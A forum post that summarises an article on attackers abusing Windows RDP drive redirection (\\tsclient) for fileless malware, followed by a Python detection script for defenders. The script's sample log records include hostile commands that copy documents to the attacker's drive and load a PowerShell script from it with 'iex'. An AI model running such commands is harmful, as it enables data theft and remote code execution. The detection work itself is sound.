Windows Remote Desktop Services Used for Fileless Malware Attacks

LASER_oneXM

Threat actors breaching company networks are deploying a cornucopia of malware over the remote desktop protocol (RDP), without leaving a trace on target hosts.
Cryptocurrency miners, info-stealers, and ransomware are executed in RAM using a remote connection, which also serves for exfiltrating useful information from compromised machines.

Exploiting Windows RDS features
The attackers leveraged a feature in Windows Remote Desktop Services that allows a client to share local drives to a Terminal Server with read and write permissions.
These drives appear on the server as a share on a virtual network location called 'tsclient' followed by the letter of the drive and can be mapped locally.
....
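As an added defensive illustration (not code from the article or this thread), the following Python snippet scans process-creation records for the `\\tsclient\<drive>` UNC path that RDP drive redirection exposes, which is the share the technique above relies on. The key="value" record format, the field names (Image, CommandLine, CurrentDirectory) and the sample records are constructed for this example.

```python
import re
from dataclasses import dataclass

# RDP drive redirection exposes the client's drives on the server as
# \\tsclient\<letter>\...; match that prefix (backslash or forward-slash form).
TSCLIENT_RE = re.compile(r"(?i)(?:\\\\|//)tsclient[\\/]([a-z])(?:[\\/]|$)")

@dataclass(frozen=True)
class Finding:
    record_id: str   # identifier of the matching log record
    image: str       # executable that was launched
    drive: str       # redirected client drive letter referenced
    field: str       # which field contained the tsclient reference

def parse_kv_line(line: str) -> dict:
    """Parse one constructed 'key="value" key2="value2"' process-creation record."""
    return {k: v for k, v in re.findall(r'(\w+)="([^"]*)"', line)}

def find_tsclient_execution(lines):
    """Return a Finding for every record whose executable path, command line or
    working directory references a \\tsclient share (first matching field wins)."""
    findings = []
    for line in lines:
        rec = parse_kv_line(line)
        for field in ("Image", "CommandLine", "CurrentDirectory"):
            m = TSCLIENT_RE.search(rec.get(field, ""))
            if m:
                findings.append(Finding(rec.get("RecordId", "?"), rec.get("Image", ""),
                                        m.group(1).upper(), field))
                break
    return findings

# Constructed sample records: one benign, three touching the redirected client drive.
SAMPLE_LOG = [
    'RecordId="1" Image="C:\\Windows\\System32\\notepad.exe" CommandLine="notepad.exe" CurrentDirectory="C:\\Users\\alice\\"',
    'RecordId="2" Image="\\\\tsclient\\C\\tools\\miner.exe" CommandLine="\\\\tsclient\\C\\tools\\miner.exe" CurrentDirectory="C:\\Windows\\system32\\"',
    'RecordId="3" Image="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd.exe /c copy C:\\Users\\alice\\Documents\\*.docx \\\\tsclient\\d\\out\\"',
    'RecordId="4" Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" CommandLine="powershell -nop -c iex (gc \\\\tsclient\\E\\p.ps1 -Raw)"',
]

if __name__ == "__main__":
    for f in find_tsclient_execution(SAMPLE_LOG):
        print(f"record {f.record_id}: {f.image} references client drive {f.drive}: via {f.field}")
```

Because the share can also be mapped to a drive letter, a complete rule would additionally watch for `net use` style mappings of `\\tsclient`, which this example leaves out.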